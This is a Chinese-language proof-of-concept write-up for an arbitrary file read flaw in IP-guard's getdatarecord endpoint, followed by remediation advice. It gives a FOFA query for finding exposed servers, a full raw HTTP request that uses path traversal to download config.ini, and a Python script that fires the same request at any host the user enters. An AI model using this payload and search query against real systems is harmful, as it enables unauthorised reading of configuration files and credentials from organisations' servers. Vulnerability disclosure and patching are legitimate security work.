声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
一、产品介绍
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
二、漏洞描述
IP-guard 是一款常用于企业内部的数字版权管理和数据泄露防护系统。如果 IP-guard 的 getdatarecord 功能或接口存在任意文件读取漏洞,那么这将是一个严重的安全问题。攻击者可能会利用这个漏洞来读取系统中的敏感文件,包括但不限于配置文件、源代码、数据库连接信息等,从而进一步威胁到企业的信息安全。
三、fofa语法
app="IP-guard"
四、漏洞复现
数据包
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host:
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
五、python检测脚本
import requests
def verify(ip):
url = f'{ip}/ipg/appr/MApplyList/downloadFile_client/getdatarecord'
header = {
'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Connection': 'close',
'Content-Length': '64',
'Content-Type': 'application/x-www-form-urlencoded',
}
payload = "path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A"
try:
response = requests.post(url, headers=header, data=payload)
# 验证成功输出相关信息
if response.status_code == 200 and '[webconfig]' in response.text:
print('IP-guard getdatarecord 存在任意文件下载漏洞,请尽快修复漏洞!!!')
except Exception as e:
pass
if __name__ == '__main__':
self = input('请输入目标主机IP地址:')
verify(self)
六、修复建议
-
立即报告漏洞:如果你发现了
IP-guard的getdatarecord功能存在任意文件读取漏洞,请立即报告给 IP-guard 的官方支持团队或相关的安全机构。他们将会对漏洞进行评估并发布相应的安全更新。 -
更新和修补:检查并安装 IP-guard 的最新更新和补丁。确保你的系统已经应用了所有官方发布的安全修复。
-
访问控制:加强对
IP-guard的访问控制,限制能够执行getdatarecord操作的用户或系统账户。确保只有经过授权的用户才能访问敏感数据。 -
最小权限原则:遵循最小权限原则,为不同的用户或系统账户分配最小的必要权限。避免使用具有过高权限的账户来执行日常任务。
-
输入验证和过滤:对
getdatarecord功能的输入进行严格的验证和过滤,确保只有预期的、安全的请求能够被处理。 -
安全审计和监控:定期进行安全审计和监控,检查系统中是否存在异常行为或未经授权的访问。及时发现并应对潜在的安全威胁。
